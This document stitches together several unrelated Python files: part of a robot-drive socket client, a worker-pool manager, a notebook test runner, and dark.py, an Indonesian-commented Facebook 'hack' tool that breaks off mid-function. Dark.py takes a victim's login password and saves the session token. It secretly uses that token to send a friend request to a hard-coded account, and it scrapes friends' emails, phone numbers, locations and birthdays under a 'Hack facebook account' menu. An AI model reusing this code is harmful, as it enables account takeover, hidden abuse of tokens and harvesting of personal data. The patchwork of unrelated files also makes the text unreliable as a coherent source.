        self.response_listener_thread = threading.Thread(target=self.response_lister, name="response listener", daemon=True)

        # Kill flag polled by both listener loops.
        self.kill = False

    # Sends a command to enable the server on the drive computer
    # Returns boolean
    def establish_connection(self, max_attempts = 5):
        """Handshake with the drive computer; True on success, exits on failure."""
        print(f"Attempting to Establish Connection with {self.ip_addr}")
        attempts = 0
        while True:
            # Create Connection (closed automatically per attempt; the
            # original leaked one socket per retry)
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.connect((self.ip_addr, self.establish_port))
                # Send request
                s.send(("Bruh, lemme control you with dis joystick!").encode())
                data = s.recv(1024)
            # Check message
            if data.decode() == "Okay no cap!":
                print("Connection Successful")
                return True
            # Increment Attempts Counter
            attempts += 1
            # Exit
            if attempts == max_attempts:
                print(util.to_color("Connection Failed, Exiting...", "red"))
                sys.exit(1)

    # Close the connector
    def close(self):
        """Ask the server to shut down and stop the listener threads."""
        print("Exiting. Killing all threads and closing sockets")
        self.kill = True
        # Create Connection (auto-closed by the context manager)
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((self.ip_addr, self.establish_port))
            # Send request
            s.send(("I think we need to talk").encode())
            # Wait and close
            time.sleep(2)

    # Sends an action to the server
    def sendAction(self, action):
        """Record the action in the keystroke log and fire it over UDP."""
        self.keystroke_logger.info(str(action))
        self.command_socket.sendto(bytes(action, 'utf-8'), (self.ip_addr, self.command_port))

    # Starts the listener threads
    def startListeners(self):
        self.log_listener_thread.start()
        self.response_listener_thread.start()

    # Listens for log info from the server
    def log_listener(self):
        """Accept connections on the log port and mirror payloads into the log."""
        self.logging_socket.bind(("", self.log_port))
        self.logging_socket.listen()
        while not self.kill:
            # Get Connection
            (clientConnected, clientAddress) = self.logging_socket.accept()
            data = clientConnected.recv(1024).decode()
            # Log
            self.logger.info(data)

    # Listens for responses from the server
    def response_lister(self):
        """Accept connections on the response port and log cart responses.

        (Method name keeps the original spelling; the thread created in
        __init__ references it by this name.)
        """
        self.response_socket.bind(("", self.response_port))
        self.response_socket.listen()
        while not self.kill:
            # Get Connection
            (clientConnected, clientAddress) = self.response_socket.accept()
            data = clientConnected.recv(1024).decode()
            # Log
            self.response_logger.info(data)
|
worker_manager.py | """
A manager for multiple workers.
-- kandasamy@cs.cmu.edu
"""
# pylint: disable=abstract-class-little-used
# pylint: disable=invalid-name
# pylint: disable=no-member
from __future__ import print_function
from argparse import Namespace
from multiprocessing import Process
import numpy as np
import os
import sys
if sys.version_info[0] < 3:
from sets import Set
else:
Set = set
import shutil
import time
# Local
from opt.function_caller import EVAL_ERROR_CODE
# Slack added to time comparisons to absorb floating-point rounding error.
TIME_TOL = 1e-5
class WorkerManager(object):
    """ Abstract base class for managing a pool of evaluation workers. """

    def __init__(self, worker_ids, poll_time):
        """ Constructor: worker_ids is an iterable of ids or a worker count. """
        self.worker_ids = (worker_ids if hasattr(worker_ids, '__iter__')
                           else list(range(worker_ids)))
        self.num_workers = len(self.worker_ids)
        self.poll_time = poll_time
        # Both attributes are (re)initialised by reset() below.
        self.optimiser = None
        self.latest_results = None
        self.reset()

    def reset(self):
        """ Clears the optimiser handle and any buffered results. """
        self.optimiser = None
        self.latest_results = []  # a list of result namespaces
        self._child_reset()

    def _child_reset(self):
        """ Child-specific reset hook. """
        raise NotImplementedError('Implement in a child class.')

    def fetch_latest_results(self):
        """ Returns the buffered results whose receive time has passed. """
        ready = []
        pending = []
        # Single pass: partition buffered results into 'already received'
        # (returned) and 'still pending' (kept for a later fetch).
        for res in self.latest_results:
            if (res.receive_time <=
                    self.optimiser.get_curr_spent_capital() + TIME_TOL):
                ready.append(res)
            else:
                pending.append(res)
        self.latest_results = pending
        return ready

    def close_all_jobs(self):
        """ Closes all jobs. """
        raise NotImplementedError('Implement in a child class.')

    def set_optimiser(self, optimiser):
        """ Attaches the optimiser whose clock drives result delivery. """
        self.optimiser = optimiser

    def a_worker_is_free(self):
        """ Returns true if at least one worker is free. """
        raise NotImplementedError('Implement in a child class.')

    def all_workers_are_free(self):
        """ Returns true if every worker is free. """
        raise NotImplementedError('Implement in a child class.')

    def _dispatch_evaluation(self, func_caller, point, qinfo):
        """ Dispatches a job. """
        raise NotImplementedError('Implement in a child class.')

    def dispatch_single_evaluation(self, func_caller, point, qinfo):
        """ Dispatches a single job. """
        raise NotImplementedError('Implement in a child class.')

    def dispatch_batch_of_evaluations(self, func_caller, points, qinfos):
        """ Dispatches an entire batch of evaluations. """
        raise NotImplementedError('Implement in a child class.')

    def get_time_distro_info(self):
        """ Returns information on the time distribution. """
        #pylint: disable=no-self-use
        return ''
# A synthetic worker manager - for simulating multiple workers ---------------------------
class SyntheticWorkerManager(WorkerManager):
    """ A Worker manager for synthetic functions. Mostly to be used in simulations. """

    def __init__(self, num_workers, time_distro='const', time_distro_params=None):
        """ Constructor.

        time_distro: 'const', 'uniform' or 'halfnormal' — the distribution of
        the simulated evaluation times.
        """
        self.worker_pipe = None
        super(SyntheticWorkerManager, self).__init__(num_workers, poll_time=None)
        # Set up the time sampler
        self.time_distro = time_distro
        self.time_distro_params = time_distro_params
        self.time_sampler = None
        self._set_up_time_sampler()

    def _set_up_time_sampler(self):
        """ Sets up the sampler for the simulated evaluation-time variable. """
        self.time_distro_params = Namespace() if self.time_distro_params is None else \
                                  self.time_distro_params
        if self.time_distro == 'const':
            if not hasattr(self.time_distro_params, 'const_val'):
                self.time_distro_params.const_val = 1
            self.time_sampler = lambda num_samples: (np.ones((num_samples,)) *
                                                     self.time_distro_params.const_val)
        elif self.time_distro == 'uniform':
            # Default each missing bound independently; the original only
            # tested 'ub', so params carrying 'ub' but no 'lb' crashed below.
            if not hasattr(self.time_distro_params, 'ub'):
                self.time_distro_params.ub = 2.0
            if not hasattr(self.time_distro_params, 'lb'):
                self.time_distro_params.lb = 0.0
            ub = self.time_distro_params.ub
            lb = self.time_distro_params.lb
            self.time_sampler = lambda num_samples: (np.random.random((num_samples,)) *
                                                     (ub - lb) + lb)
        elif self.time_distro == 'halfnormal':
            # BUG FIX: the original checked hasattr(..., 'ub') here (copy-paste
            # from the uniform branch); it must check for 'sigma', otherwise a
            # params namespace with 'ub' but no 'sigma' fails at sample time.
            if not hasattr(self.time_distro_params, 'sigma'):
                self.time_distro_params.sigma = np.sqrt(np.pi/2)
            self.time_sampler = lambda num_samples: np.abs(np.random.normal(
                scale=self.time_distro_params.sigma, size=(num_samples,)))
        else:
            raise NotImplementedError('Not implemented time_distro = %s yet.'%(
                self.time_distro))

    def _child_reset(self):
        """ Child reset: every worker becomes free at time 0. """
        self.worker_pipe = [[wid, 0.0] for wid in self.worker_ids]

    def sort_worker_pipe(self):
        """ Sorts worker pipe by finish time. """
        self.worker_pipe.sort(key=lambda x: x[-1])

    def a_worker_is_free(self):
        """ Returns the earliest simulated finish time (always truthy-free). """
        return self.worker_pipe[0][-1]  # Always return true as this is synthetic.

    def all_workers_are_free(self):
        """ Returns the latest simulated finish time. """
        return self.worker_pipe[-1][-1]

    def close_all_jobs(self):
        """ Close all jobs: nothing to do for synthetic evaluations. """
        pass

    def _dispatch_evaluation(self, func_caller, point, qinfo, worker_id, **kwargs):
        """ Evaluates the point synchronously and fakes the timing metadata. """
        qinfo.worker_id = worker_id  # indicate which worker
        val, qinfo = func_caller.eval_single(point, qinfo, **kwargs)
        qinfo.eval_time = float(self.time_sampler(1))  # simulated wall time
        qinfo.val = val
        qinfo.receive_time = qinfo.send_time + qinfo.eval_time
        # Store the result in latest_results
        self.latest_results.append(qinfo)
        return qinfo

    def dispatch_single_evaluation(self, func_caller, point, qinfo, **kwargs):
        """ Dispatch a single evaluation to the earliest-free worker. """
        worker_id = self.worker_pipe[0][0]
        qinfo = self._dispatch_evaluation(func_caller, point, qinfo, worker_id, **kwargs)
        # Update this worker's finish time and re-sort the pipe.
        self.worker_pipe[0][-1] = qinfo.receive_time
        self.sort_worker_pipe()

    def dispatch_batch_of_evaluations(self, func_caller, points, qinfos, **kwargs):
        """ Dispatches an entire batch of evaluations, one per worker. """
        assert len(points) == self.num_workers
        for idx in range(self.num_workers):
            qinfo = self._dispatch_evaluation(func_caller, points[idx], qinfos[idx],
                                              self.worker_pipe[idx][0], **kwargs)
            self.worker_pipe[idx][-1] = qinfo.receive_time
        self.sort_worker_pipe()

    def get_time_distro_info(self):
        """ Returns information on the time distribution. """
        return self.time_distro
# Real worker manager - for simulating multiple workers --------------------------------
class RealWorkerManager(WorkerManager):
    """ A worker manager that runs real evaluations in child processes.

    Workers communicate through the file system: each worker has a result
    directory and a working directory, and an evaluation writes result.txt
    into the result directory when it finishes.
    """
    # pylint: disable=attribute-defined-outside-init

    def __init__(self, worker_ids, poll_time=0.5):
        """ Constructor. """
        super(RealWorkerManager, self).__init__(worker_ids, poll_time)
        self._rwm_set_up()
        self._child_reset()

    def _rwm_set_up(self):
        """ Sets up per-worker directories and bookkeeping. """
        # Create the result directories.
        self.result_dir_names = {wid:'exp/result_%s'%(str(wid)) for wid in
                                 self.worker_ids}
        # Create the working directories
        self.working_dir_names = {wid:'exp/working_%s/tmp'%(str(wid)) for wid in
                                  self.worker_ids}
        # Create the last receive times
        self.last_receive_times = {wid:0.0 for wid in self.worker_ids}
        # Create file names
        self._result_file_name = 'result.txt'
        self._num_file_read_attempts = 10
        # self._file_read_poll_time = 0.5 # wait for 0.5 seconds

    @classmethod
    def _delete_dirs(cls, list_of_dir_names):
        """ Deletes a list of directories. """
        for dir_name in list_of_dir_names:
            if os.path.exists(dir_name):
                shutil.rmtree(dir_name)

    @classmethod
    def _delete_and_create_dirs(cls, list_of_dir_names):
        """ Deletes a list of directories and creates new (empty) ones. """
        for dir_name in list_of_dir_names:
            if os.path.exists(dir_name):
                shutil.rmtree(dir_name)
            os.makedirs(dir_name)

    def _child_reset(self):
        """ Resets child: fresh directories, all workers marked free. """
        # Delete/create the result and working directories.
        if not hasattr(self, 'result_dir_names'):  # Just for the super constructor.
            return
        self._delete_and_create_dirs(self.result_dir_names.values())
        self._delete_dirs(self.working_dir_names.values())
        self.free_workers = Set(self.worker_ids)
        self.qinfos_in_progress = {wid:None for wid in self.worker_ids}
        self.worker_processes = {wid:None for wid in self.worker_ids}

    def _get_result_file_name_for_worker(self, worker_id):
        """ Computes the result file name for the worker. """
        return os.path.join(self.result_dir_names[worker_id], self._result_file_name)

    def _read_result_from_file(self, result_file_name):
        """ Reads the result file, retrying a bounded number of times.

        Returns the float value on success (or the raw string if it is an
        error message), and EVAL_ERROR_CODE when the file never became
        readable within the allowed attempts.
        """
        num_attempts = 0
        result = EVAL_ERROR_CODE  # fallback when all attempts fail
        while num_attempts < self._num_file_read_attempts:
            try:
                # `with` guarantees the handle is closed; the original could
                # also hit an unbound file_reader on the failure path.
                with open(result_file_name, 'r') as file_reader:
                    read_in = file_reader.read().strip()
                try:
                    # try converting to float. If not successful, it is likely an error string.
                    read_in = float(read_in)
                except ValueError:
                    pass
                result = read_in
                break
            except Exception:
                # BUG FIX: the original never incremented num_attempts, so a
                # persistently unreadable file caused an infinite retry loop.
                num_attempts += 1
                time.sleep(self.poll_time)
        return result

    def _read_result_from_worker_and_update(self, worker_id):
        """ Reads the worker's result file and books the finished evaluation. """
        # Read the file
        result_file_name = self._get_result_file_name_for_worker(worker_id)
        val = self._read_result_from_file(result_file_name)
        # Now update the relevant qinfo and put it to latest_results
        qinfo = self.qinfos_in_progress[worker_id]
        qinfo.val = val
        if not hasattr(qinfo, 'true_val'):
            qinfo.true_val = val
        qinfo.receive_time = self.optimiser.get_curr_spent_capital()
        qinfo.eval_time = qinfo.receive_time - qinfo.send_time
        self.latest_results.append(qinfo)
        # Update receive time
        self.last_receive_times[worker_id] = qinfo.receive_time
        # Delete the file.
        os.remove(result_file_name)
        # Delete content in a working directory.
        shutil.rmtree(self.working_dir_names[worker_id])
        # Add the worker to the list of free workers and clear qinfos in progress.
        self.worker_processes[worker_id].terminate()
        self.worker_processes[worker_id] = None
        self.qinfos_in_progress[worker_id] = None
        self.free_workers.add(worker_id)

    def _worker_is_free(self, worker_id):
        """ Checks if worker with worker_id is free (collecting its result if done). """
        if worker_id in self.free_workers:
            return True
        worker_result_file_name = self._get_result_file_name_for_worker(worker_id)
        if os.path.exists(worker_result_file_name):
            self._read_result_from_worker_and_update(worker_id)
            # BUG FIX: the worker was just released above, so report it free
            # now (the original fell through and returned None here, delaying
            # the 'free' answer by one poll).
            return True
        return False

    def _get_last_receive_time(self):
        """ Returns the most recent time any worker returned a result. """
        all_receive_times = self.last_receive_times.values()
        return max(all_receive_times)

    def a_worker_is_free(self):
        """ Returns the last receive time if some worker is free, else None. """
        for wid in self.worker_ids:
            if self._worker_is_free(wid):
                return self._get_last_receive_time()
        return None

    def all_workers_are_free(self):
        """ Returns the last receive time if every worker is free, else None. """
        all_are_free = True
        for wid in self.worker_ids:
            # Query every worker (no short-circuit) so finished results are
            # collected from all of them on each poll.
            all_are_free = self._worker_is_free(wid) and all_are_free
        if all_are_free:
            return self._get_last_receive_time()
        else:
            return None

    def _dispatch_evaluation(self, func_caller, point, qinfo, worker_id, **kwargs):
        """ Dispatches evaluation to worker_id in a fresh child process. """
        if self.qinfos_in_progress[worker_id] is not None:
            err_msg = 'qinfos_in_progress: %s,\nfree_workers: %s.'%(
                str(self.qinfos_in_progress), str(self.free_workers))
            print(err_msg)
            raise ValueError('Check if worker is free before sending evaluation.')
        # First add all the data to qinfo
        qinfo.worker_id = worker_id
        qinfo.working_dir = self.working_dir_names[worker_id]
        qinfo.result_file = self._get_result_file_name_for_worker(worker_id)
        qinfo.point = point
        # Create the working directory
        os.makedirs(qinfo.working_dir)
        # Dispatch the evaluation in a new process
        target_func = lambda: func_caller.eval_single(point, qinfo, **kwargs)
        self.worker_processes[worker_id] = Process(target=target_func)
        self.worker_processes[worker_id].start()
        time.sleep(3)  # give the child a head start before polling resumes
        # Mark the worker busy.
        self.qinfos_in_progress[worker_id] = qinfo
        self.free_workers.discard(worker_id)

    def dispatch_single_evaluation(self, func_caller, point, qinfo, **kwargs):
        """ Dispatches a single evaluation to a free worker. """
        worker_id = self.free_workers.pop()
        self._dispatch_evaluation(func_caller, point, qinfo, worker_id, **kwargs)

    def dispatch_batch_of_evaluations(self, func_caller, points, qinfos, **kwargs):
        """ Dispatches a batch of evaluations, one per worker. """
        assert len(points) == self.num_workers
        for idx in range(self.num_workers):
            self._dispatch_evaluation(func_caller, points[idx], qinfos[idx],
                                      self.worker_ids[idx], **kwargs)

    def close_all_jobs(self):
        """ Closes all jobs (children exit on their own; nothing to do). """
        pass

    def get_time_distro_info(self):
        """ Returns information on the time distribution. """
        return 'realtime'
|
testrunner.py | #!/usr/bin/env python
# coding: utf-8
from datetime import datetime
startTime = datetime.now()
import itertools
import json
import multiprocessing as mp
import os
import sys
import time
try:
import pandas as pd
import papermill
from tabulate import tabulate
except ImportError:
sys.exit(
"""Some libraries are missing. Please install them by running `pip install -r test_requirements.txt`."""
)
# CONSTANTS
manager = mp.Manager()
TEST_NOTEBOOKS_FILE = "testnotebooks.txt"   # one notebook path per line
TEST_CONFIG_FILE = "testconfig.csv"         # parameter grid, one row per run
SUCCESSES = mp.Value("d", 0)                # shared counter across processes
EXCEPTIONS = mp.Value("d", 0)               # shared counter across processes
SUCCESSFUL_EXECUTIONS = manager.list()      # shared record of passing cases
FAILED_EXECUTIONS = manager.list()          # shared record of failing cases
CELL_EXECUTION_TIMEOUT_SECONDS = 1200
ROOT = os.path.abspath(".")
jobs = []                                   # processes spawned by test_notebook()
# helper functions
def execute_nb_with_params(nb_path, params):
    """Execute one notebook via papermill with the given parameters.

    Runs inside a child process: chdir into the notebook's directory, execute
    it, and record the outcome in the shared counters/result lists.

    Args:
        nb_path: notebook path relative to ROOT.
        params: dict of papermill parameters injected into the notebook.
    """
    abs_nb_dir_path = os.path.join(ROOT, os.path.dirname(nb_path))
    nb_name = os.path.basename(nb_path)
    output_nb_name = "output_{}.ipynb".format(nb_name)
    os.chdir(abs_nb_dir_path)
    print("Current directory: {}".format(os.getcwd()))
    print("RUN: " + nb_name + " with parameters " + str(params))
    # Execute notebook
    test_case = {"notebook": nb_name, "params": params}
    try:
        papermill.execute_notebook(
            nb_name,
            output_nb_name,
            parameters=params,
            execution_timeout=CELL_EXECUTION_TIMEOUT_SECONDS,
            log_output=True,
        )
        # `Value.value += 1` is a non-atomic read-modify-write; take the
        # Value's lock so concurrent workers cannot lose updates.
        with SUCCESSES.get_lock():
            SUCCESSES.value += 1
        SUCCESSFUL_EXECUTIONS.append(test_case)
    except BaseException as error:
        # Deliberately broad: any failure in the child (including notebook
        # cell errors) must be counted rather than crash the runner.
        print("An exception occurred: {}".format(error))
        with EXCEPTIONS.get_lock():
            EXCEPTIONS.value += 1
        FAILED_EXECUTIONS.append(test_case)
    finally:
        # Always restore the launch directory for subsequent dispatches.
        os.chdir(ROOT)
def test_notebook(nb_path, df_test_config):
    """Spawn one child process per test-config row to execute `nb_path`.

    Processes are appended to the module-level `jobs` list so the caller can
    join them later.
    """
    for i in range(len(df_test_config)):
        params = json.loads(df_test_config.loc[i].to_json())
        # Coach notebooks support only single instance training, so skip the tests
        # with multiple EC2 instances. `.get(..., 1)` keeps configs without a
        # train_instance_count column from raising KeyError.
        if "coach" in nb_path.lower() and params.get("train_instance_count", 1) > 1:
            continue
        p = mp.Process(target=execute_nb_with_params, args=(nb_path, params))
        # Brief pause staggers process launches.
        time.sleep(1)
        jobs.append(p)
        p.start()
def print_notebook_executions(nb_list_with_params):
    """Pretty-print a list of execution records as a table.

    Expects a list of dicts, e.g. [{'notebook': 'foo', 'params': 'bar'}];
    every dict is assumed to share the keys of the first one. Prints "None"
    for an empty list.
    """
    if not nb_list_with_params:
        print("None")
        return
    # Column headers come from the first record; one row of values per record.
    keys = list(nb_list_with_params[0].keys())
    vals = [list(nb_dict.values()) for nb_dict in nb_list_with_params]
    print(tabulate(pd.DataFrame(vals, columns=keys), showindex=False))
if __name__ == "__main__":
    # Read the notebooks under test; the context manager closes the file
    # handle, and blank lines are skipped so they are not dispatched.
    with open(TEST_NOTEBOOKS_FILE) as f:
        notebooks_list = [line.strip() for line in f if line.strip()]
    config = pd.read_csv(TEST_CONFIG_FILE)
    # Run tests on each notebook listed in the config.
    print("Test Configuration: ")
    print(config)
    for nb_path in notebooks_list:
        print("Testing: {}".format(nb_path))
        test_notebook(nb_path, config)
    # Wait for every spawned child before tallying results.
    for job in jobs:
        job.join()
    # Print summary of tests ran. The shared Values are doubles ("d"), so
    # cast to int to avoid printing "2.0/3.0".
    print(
        "Summary: {}/{} tests passed.".format(
            int(SUCCESSES.value), int(SUCCESSES.value + EXCEPTIONS.value)
        )
    )
    print("Successful executions: ")
    print_notebook_executions(SUCCESSFUL_EXECUTIONS)
    # Throw exception if any test fails, so that the CodeBuild also fails.
    if EXCEPTIONS.value > 0:
        print("Failed executions: ")
        print_notebook_executions(FAILED_EXECUTIONS)
        raise Exception("Test did not complete successfully")
    print("Total time taken for tests: ")
    print(datetime.now() - startTime)
|
dark.py | #!/usr/bin/python
# coding=utf-8
#jangan di recode ngentot
#recode jomblo seumur hidup
# (MANG ENGKUR) PEMBUAT
#SUBSCRIBE CHANNEL mang engkur smd-ices
#FOLLOW INSTAGRAM @T&D
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import requests
except ImportError:
os.system("pip2 install requests")
from requests.exceptions import ConnectionError
from mechanize import Browser
#-Setting-#
########
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent','Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
#-Keluar-#
def keluar():
print "\033[1;91m[!] Exit"
os.sys.exit()
#-Warna-#
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
#-Animasi-#
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """\033[1;96m█████████
\033[1;96m█▄█████▄█ \033[1;91m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●
\033[1;96m█\033[1;91m▼▼▼▼▼ \033[1;95m- _ --_--\033[1;95m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗
\033[1;96m█ \033[1;92m \033[1;95m_-_-- -_ --__\033[1;93m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗
\033[1;96m█\033[1;91m▲▲▲▲▲\033[1;95m-- - _ --\033[1;96m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \033[1;96mKUYA-PINTAR
\033[1;96m█████████ \033[1;92m«----------✧----------»
\033[1;96m ██ ██
\033[1;96m╔══════════════════════════════════════════════╗
\033[1;96m║\033[1;96m* \033[1;95mAuthor \033[1;93m: \033[1;95mBrother•MR.KUYA PINTAR \033[1;96m ║
\033[1;96m║\033[1;96m* \033[1;96mGitHub \033[1;93m: \033[1;96m\033[4mhttps://github.com/kuy149\033[0m \033[1;96m ║
\033[1;96m║\033[1;96m*\033[1;93mYOUTUBE \033[1;93m: \033[1;91m\033mhttps://youtube.com/c/mang engkur smd\033[0m \033[1;96m ║
\033[1;96m║\033[1;97m*\033[1;97mINSTAGRAM\033[1;92m: \033[1;96m\033m@T&D\033[0m \033[1;96m ║
\033[1;96m╚══════════════════════════════════════════════╝"""
# titik #
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[●] \033[1;92mLoading \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
gagal = []
idteman = []
idfromteman = []
idmem = []
emmem = []
nomem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
##### LICENSE #####
#=================#
def lisensi():
os.system('reset')
masuk()
##### Pilih Login #####
def masuk():
os.system('reset')
print logo
print "\033[1;91m║--\033[1;91m> \033[1;95m1.\033[1;96m Login"
print "\033[1;92m║--\033[1;91m> \033[1;95m2.\033[1;96m Login using token"
print "\033[1;93m║--\033[1;91m> \033[1;95m0.\033[1;96m Exit"
print "\033[1;95m║"
msuk = raw_input("\033[1;96m╚═\033[1;1mD \033[1;93m")
if msuk =="":
print"\033[1;91m[!] Wrong input"
keluar()
elif msuk =="1":
login()
elif msuk =="2":
tokenz()
elif msuk =="0":
keluar()
else:
print"\033[1;91m[!] Wrong input"
keluar()
##### LOGIN #####
#================#
def login():
os.system('reset')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('reset')
print logo
print('\033[1;96m[☆] \033[1;92mLOGIN AKUN FACEBOOK \033[1;91m[☆]')
id = raw_input('\033[1;91m[+] \033[1;36mID\033[1;97m|\033[1;96mEmail\033[1;97m \033[1;91m:\033[1;92m ')
pwd = getpass.getpass('\033[1;95m[+] \033[1;93mPassword \033[1;93m:\033[1;95m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;91m[!] No connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
zedd = open("login.txt", 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mLogin successfully'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://github.com/CrazyLolz100')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;91m[!] No connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;91m[!] \033[1;93mAccount Checkpoint")
print("\n\033[1;92m[#] Harap Login Ulang !")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;91m[!] Login Failed")
os.system('rm -rf login.txt')
time.sleep(1)
login()
##### TOKEN #####
def tokenz():
os.system('reset')
print logo
toket = raw_input("\033[1;91m[?] \033[1;92mToken\033[1;91m : \033[1;97m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Wrong"
e = raw_input("\033[1;91m[?] \033[1;92mWant to pick up token?\033[1;97m[y/n]: ")
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
##### MENU ##########################################
def menu():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('reset')
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('reset')
print"\033[1;91m[!] \033[1;93mAccount Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] No connection"
keluar()
os.system("reset")
print logo
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m"
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m ID \033[1;91m: \033[1;92m"+id
print "\033[1;97m╚"+40*"═"
print "\033[1;94m║--\033[1;91m> \033[1;93m1.\033[1;95m User information"
print "\033[1;94m║--\033[1;91m> \033[1;93m2.\033[1;95m Get Id/email/hp"
print "\033[1;94m║--\033[1;91m> \033[1;93m3.\033[1;95m Hack facebook account "
print "\033[1;94m║--\033[1;91m> \033[1;93m4.\033[1;95m Bot "
print "\033[1;94m║--\033[1;91m> \033[1;93m5.\033[1;95m Others "
print "\033[1;94m║--\033[1;91m> \033[1;93m6.\033[1;95m Show token "
print "\033[1;94m║--\033[1;91m> \033[1;93m7.\033[1;95m Delete trash "
print "\033[1;94m║--\033[1;91m> \033[1;93m8.\033[1;95m LogOut "
print "\033[1;94m║--\033[1;91m> \033[1;93m0.\033[1;95m Exit the programs "
print "║"
pilih()
#-
def pilih():
zedd = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if zedd =="":
print "\033[1;91m[!] Wrong input"
pilih()
elif zedd =="1":
informasi()
elif zedd =="2":
dump()
elif zedd =="3":
menu_hack()
elif zedd =="4":
menu_bot()
elif zedd =="5":
lain()
elif zedd =="6":
os.system('reset')
print logo
toket=open('login.txt','r').read()
print "\033[1;91m[+] \033[1;92mYour token\033[1;91m :\033[1;97m "+toket
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
elif zedd =="7":
os.remove('out')
elif zedd =="8":
os.system('rm -rf login.txt')
os.system('xdg-open https://github.com/apaansihasw779')
keluar()
elif zedd =="0":
keluar()
else:
print "\033[1;91m[!] Wrong input"
pilih()
##### INFO #####
def informasi():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
aid = raw_input('\033[1;91m[+] \033[1;92mEnter ID\033[1;97m/\033[1;92mName\033[1;91m : \033[1;97m')
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 42*"\033[1;97m═"
try:
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+z['name']
except KeyError: print '\033[1;91m[?] \033[1;92mName\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;91m[?] \033[1;92mID\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;91m[?] \033[1;92mEmail\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mTelephone\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;91m[?] \033[1;92mTelephone\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mLocation\033[1;97m : '+z['location']['name']
except KeyError: print '\033[1;91m[?] \033[1;92mLocation\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mDate of birth\033[1;97m : '+z['birthday']
